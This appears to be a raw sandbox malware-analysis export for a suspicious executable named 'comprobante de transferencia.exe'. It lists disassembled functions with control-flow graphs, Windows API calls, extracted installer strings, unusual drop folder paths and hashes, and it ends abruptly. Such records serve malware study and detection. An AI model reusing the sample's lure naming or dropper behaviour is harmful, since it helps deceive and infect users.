                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                            • API String ID: 606308-215983927
                                            • Opcode ID: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                            • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                            • Opcode Fuzzy Hash: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                            • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 360 402dee-402e3c GetTickCount GetModuleFileNameW call 405bef 363 402e48-402e76 call 40601a call 405a1a call 40601a GetFileSize 360->363 364 402e3e-402e43 360->364 372 402f63-402f71 call 402d8a 363->372 373 402e7c 363->373 365 403020-403024 364->365 379 402f73-402f76 372->379 380 402fc6-402fcb 372->380 375 402e81-402e98 373->375 377 402e9a 375->377 378 402e9c-402ea5 call 40320c 375->378 377->378 386 402eab-402eb2 378->386 387 402fcd-402fd5 call 402d8a 378->387 382 402f78-402f90 call 403222 call 40320c 379->382 383 402f9a-402fc4 GlobalAlloc call 403222 call 403027 379->383 380->365 382->380 410 402f92-402f98 382->410 383->380 408 402fd7-402fe8 383->408 392 402eb4-402ec8 call 405baa 386->392 393 402f2e-402f32 386->393 387->380 398 402f3c-402f42 392->398 407 402eca-402ed1 392->407 397 402f34-402f3b call 402d8a 393->397 393->398 397->398 404 402f51-402f5b 398->404 405 402f44-402f4e call 4064a5 398->405 404->375 409 402f61 404->409 405->404 407->398 413 402ed3-402eda 407->413 414 402ff0-402ff5 408->414 415 402fea 408->415 409->372 410->380 410->383 413->398 416 402edc-402ee3 413->416 417 402ff6-402ffc 414->417 415->414 416->398 418 402ee5-402eec 416->418 417->417 419 402ffe-403019 SetFilePointer call 405baa 417->419 418->398 420 402eee-402f0e 418->420 423 40301e 419->423 420->380 422 402f14-402f18 420->422 424 402f20-402f28 422->424 425 402f1a-402f1e 422->425 423->365 424->398 426 402f2a-402f2c 424->426 425->409 425->424 426->398
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402DFF
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\comprobante de transferencia.exe,00000400,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402E1B
                                              • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405BF3
                                              • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405C15
                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\comprobante de transferencia.exe,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402E67
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\comprobante de transferencia.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                            • API String ID: 4283519449-1577287286
                                            • Opcode ID: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
                                            • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                            • Opcode Fuzzy Hash: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
                                            • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 427 40603c-406047 428 406049-406058 427->428 429 40605a-406070 427->429 428->429 430 406076-406083 429->430 431 406288-40628e 429->431 430->431 432 406089-406090 430->432 433 406294-40629f 431->433 434 406095-4060a2 431->434 432->431 436 4062a1-4062a5 call 40601a 433->436 437 4062aa-4062ab 433->437 434->433 435 4060a8-4060b4 434->435 438 406275 435->438 439 4060ba-4060f6 435->439 436->437 441 406283-406286 438->441 442 406277-406281 438->442 443 406216-40621a 439->443 444 4060fc-406107 GetVersion 439->444 441->431 442->431 447 40621c-406220 443->447 448 40624f-406253 443->448 445 406121 444->445 446 406109-40610d 444->446 454 406128-40612f 445->454 446->445 451 40610f-406113 446->451 452 406230-40623d call 40601a 447->452 453 406222-40622e call 405f61 447->453 449 406262-406273 lstrlenW 448->449 450 406255-40625d call 40603c 448->450 449->431 450->449 451->445 459 406115-406119 451->459 463 406242-40624b 452->463 453->463 455 406131-406133 454->455 456 406134-406136 454->456 455->456 461 406172-406175 456->461 462 406138-40615e call 405ee7 456->462 459->445 464 40611b-40611f 459->464 468 406185-406188 461->468 469 406177-406183 GetSystemDirectoryW 461->469 475 406164-40616d call 40603c 462->475 476 4061fd-406201 462->476 463->449 467 40624d 463->467 464->454 471 40620e-406214 call 4062ae 467->471 473 4061f3-4061f5 468->473 474 40618a-406198 GetWindowsDirectoryW 468->474 472 4061f7-4061fb 469->472 471->449 472->471 472->476 473->472 477 40619a-4061a4 473->477 474->473 475->472 476->471 480 406203-406209 lstrcatW 476->480 482 4061a6-4061a9 477->482 483 4061be-4061d4 SHGetSpecialFolderLocation 477->483 480->471 482->483 487 4061ab-4061b2 482->487 484 4061d6-4061ed SHGetPathFromIDListW CoTaskMemFree 483->484 485 4061ef 483->485 484->472 484->485 485->473 488 4061ba-4061bc 487->488 488->472 488->483
                                            APIs
                                            • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 004060FF
                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040617D
                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406190
                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                            • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DA
                                            • CoTaskMemFree.OLE32(?), ref: 004061E5
                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                            • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 00406263
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 900638850-1338831902
                                            • Opcode ID: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                            • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                            • Opcode Fuzzy Hash: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                            • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,?,?,00000031), ref: 004017CD
                                              • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                              • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
                                              • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp$C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call
                                            • API String ID: 1941528284-1309035676
                                            • Opcode ID: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
                                            • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                            • Opcode Fuzzy Hash: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
                                            • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 619 405179-40518e 620 405194-4051a5 619->620 621 405245-405249 619->621 622 4051b0-4051bc lstrlenW 620->622 623 4051a7-4051ab call 40603c 620->623 625 4051d9-4051dd 622->625 626 4051be-4051ce lstrlenW 622->626 623->622 628 4051ec-4051f0 625->628 629 4051df-4051e6 SetWindowTextW 625->629 626->621 627 4051d0-4051d4 lstrcatW 626->627 627->625 630 4051f2-405234 SendMessageW * 3 628->630 631 405236-405238 628->631 629->628 630->631 631->621 632 40523a-40523d 631->632 632->621
                                            APIs
                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                            • lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll
                                            • API String ID: 2531174081-2621151191
                                            • Opcode ID: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                            • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                            • Opcode Fuzzy Hash: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                            • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 639 4025e5-4025fa call 402ba2 642 402600-402607 639->642 643 402a4c-402a4f 639->643 644 402609 642->644 645 40260c-40260f 642->645 646 402a55-402a5b 643->646 644->645 647 402773-40277b 645->647 648 402615-402624 call 405f7a 645->648 647->643 648->647 652 40262a 648->652 653 402630-402634 652->653 654 4026c9-4026cc 653->654 655 40263a-402655 ReadFile 653->655 656 4026e4-4026f4 call 405c72 654->656 657 4026ce-4026d1 654->657 655->647 658 40265b-402660 655->658 656->647 668 4026f6 656->668 657->656 659 4026d3-4026de call 405cd0 657->659 658->647 661 402666-402674 658->661 659->647 659->656 664 40267a-40268c MultiByteToWideChar 661->664 665 40272f-40273b call 405f61 661->665 664->668 669 40268e-402691 664->669 665->646 671 4026f9-4026fc 668->671 672 402693-40269e 669->672 671->665 673 4026fe-402703 671->673 672->671 674 4026a0-4026c5 SetFilePointer MultiByteToWideChar 672->674 675 402740-402744 673->675 676 402705-40270a 673->676 674->672 677 4026c7 674->677 678 402761-40276d SetFilePointer 675->678 679 402746-40274a 675->679 676->675 680 40270c-40271f 676->680 677->668 678->647 681 402752-40275f 679->681 682 40274c-402750 679->682 680->647 683 402721-402727 680->683 681->647 682->678 682->681 683->653 684 40272d 683->684 684->647
                                            APIs
                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                            • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                              • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405CE6
                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                            • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                            • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                            • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 685 406384-4063a4 GetSystemDirectoryW 686 4063a6 685->686 687 4063a8-4063aa 685->687 686->687 688 4063bb-4063bd 687->688 689 4063ac-4063b5 687->689 691 4063be-4063f1 wsprintfW LoadLibraryExW 688->691 689->688 690 4063b7-4063b9 689->690 690->691
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                            • wsprintfW.USER32 ref: 004063D6
                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925
                                            • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                            • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                            • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                            • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-40304f 692->694 693->694 695 403051 694->695 696 403056-40305b 694->696 695->696 697 40306b-403078 call 40320c 696->697 698 40305d-403066 call 403222 696->698 702 4031c3 697->702 703 40307e-403082 697->703 698->697 706 4031c5-4031c6 702->706 704 403088-4030a8 GetTickCount call 406513 703->704 705 4031ac-4031ae 703->705 716 403202 704->716 718 4030ae-4030b6 704->718 707 4031b0-4031b3 705->707 708 4031f7-4031fb 705->708 710 403205-403209 706->710 711 4031b5 707->711 712 4031b8-4031c1 call 40320c 707->712 713 4031c8-4031ce 708->713 714 4031fd 708->714 711->712 712->702 725 4031ff 712->725 719 4031d0 713->719 720 4031d3-4031e1 call 40320c 713->720 714->716 716->710 722 4030b8 718->722 723 4030bb-4030c9 call 40320c 718->723 719->720 720->702 729 4031e3-4031ef call 405ca1 720->729 722->723 723->702 730 4030cf-4030d8 723->730 725->716 734 4031f1-4031f4 729->734 735 4031a8-4031aa 729->735 733 4030de-4030fb call 406533 730->733 738 403101-403118 GetTickCount 733->738 739 4031a4-4031a6 733->739 734->708 735->706 740 403163-403165 738->740 741 40311a-403122 738->741 739->706 744 403167-40316b 740->744 745 403198-40319c 740->745 742 403124-403128 741->742 743 40312a-40315b MulDiv wsprintfW call 405179 741->743 742->740 742->743 750 403160 743->750 747 403180-403186 744->747 748 40316d-403172 call 405ca1 744->748 745->718 749 4031a2 745->749 752 40318c-403190 747->752 753 403177-403179 748->753 749->716 750->740 752->733 754 403196 752->754 753->735 755 40317b-40317e 753->755 754->716 755->752
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 551687249-2449383134
                                            • Opcode ID: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                            • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                            • Opcode Fuzzy Hash: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                            • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 756 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 763 4023c7-4023cf 756->763 764 402a4c-402a5b 756->764 765 4023d1-4023de call 402bbf lstrlenW 763->765 766 4023e2-4023e5 763->766 765->766 769 4023f5-4023f8 766->769 770 4023e7-4023f4 call 402ba2 766->770 774 402409-40241d RegSetValueExW 769->774 775 4023fa-402404 call 403027 769->775 770->769 778 402422-4024fc RegCloseKey 774->778 779 40241f 774->779 775->774 778->764 781 40281e-402825 778->781 779->778 781->764
                                            APIs
